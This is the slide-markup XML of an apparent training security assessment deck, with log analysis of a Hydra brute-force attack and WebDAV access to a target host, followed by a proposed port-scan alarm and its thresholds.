              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B34D7A2-5EE4-47CE-84EC-080EBB4B6F69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073426" y="2639675"/>
            <a:ext cx="7907704" cy="423104"/>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043;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA0A5693-C76C-4377-BE19-DA6327B7D335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073426" y="3172829"/>
            <a:ext cx="7907704" cy="423104"/>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043;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69817C59-1F78-4B80-9125-0AB5579DF802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073426" y="3698990"/>
            <a:ext cx="7907704" cy="423104"/>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043;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DE86ED6-E6B7-4C20-B888-FF218A237B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068441" y="4224094"/>
            <a:ext cx="7907704" cy="423104"/>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046;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF605DF-38CF-4466-A87F-4BE0A03B2735}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="4216592"/>
            <a:ext cx="9143996" cy="423104"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>References : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Resources and References</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;1046;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4097EB49-3800-4E0F-BAA1-CCF461B056C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3698169"/>
            <a:ext cx="9143997" cy="423104"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Assessment Summary</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Google Shape;1046;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74241C3F-0135-4987-8EB2-90928E99235B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1063940"/>
            <a:ext cx="9144000" cy="423104"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;1046;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{459EABDC-5348-4796-934A-171A50624991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1590037"/>
            <a:ext cx="9144000" cy="423104"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Red Team: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Security Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Google Shape;1046;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90AD568-43CD-4E74-A42F-349FA4EE1BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2109766"/>
            <a:ext cx="9143999" cy="423104"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Blue Team: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Log Analysis and Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;1046;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CCF6770-FF26-4D3B-BBCE-E22FC23F0156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2638243"/>
            <a:ext cx="9143998" cy="423104"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hardening: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Proposed Alarms and Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;1046;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F37AA5-A875-48CE-95D7-CEFF0180E864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3176615"/>
            <a:ext cx="9143997" cy="423104"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Appendix : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit Reconstruction - Code and Resources</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis: Uncovering the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1182" name="Google Shape;1182;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269352" y="1710122"/>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n-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="210859" y="626682"/>
            <a:ext cx="8658816" cy="769996"/>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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>There were 16,178 packet requests made by a Brute Force Attack (specifically, Hydra). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Two attacks were successful. The http response code 301 indicates a successful discovery of the correct password and was redirected to another web page.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="269352" y="669524"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3DC55C1-7549-4D44-BD71-3C89CB2CC0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8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8523D24-9CA9-4004-BD8D-AB759D91D877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724166" y="1713100"/>
            <a:ext cx="3962258" cy="2627127"/>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3A7FD148-9D06-4E1A-BCC9-0A5B7F78C113}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="277124" y="1672515"/>
            <a:ext cx="4439270" cy="2421707"/>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C33901BF-ED56-4C9A-B44A-C04F23276418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="277124" y="3942154"/>
            <a:ext cx="3797265" cy="108190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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis: Finding the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192" name="Google Shape;1192;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1454062"/>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mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171102" y="620055"/>
            <a:ext cx="8696920" cy="685284"/>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latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>93 total requests were made for the WebDAV directory (192.168.1.105/webdav)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The files passwd.dav and shell.php were requested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Request methods include the following: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET, PUT, PROPFIND and OPTIONS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275978" y="669524"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC2A3358-5172-4FBB-8D93-7747858E79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descr="Graphical user interface&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34605D7C-4A0D-493E-AA53-94184EF7FAFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="238052" y="1304431"/>
            <a:ext cx="8538597" cy="2840580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495F2D37-A860-4BEF-9263-6F2065B63533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="238052" y="3376640"/>
            <a:ext cx="4903792" cy="1686160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A screenshot of a phone&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C8D81C9-34E0-4052-9CED-1BD5D09E1B3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7278901" y="622667"/>
            <a:ext cx="1634808" cy="15380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Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="3400" dirty="0">
              <a:latin typeface="+mj-l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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{844B5798-0A7E-4797-8714-14E5FD61A0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Mitigation: Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1430268"/>
            <a:ext cx="4638261" cy="33142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kind of alarm can be set to detect future port scans?</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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An alert could be set to trigger when a large amount of traffic</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occurs in a short time from a single source IP that targets multiple ports. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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 possible threshold for this alert could be if any single IP address requests more than 10 requests per second and more than 10 seconds or 100 consecutive ping (ICMP) requests.</a:t>
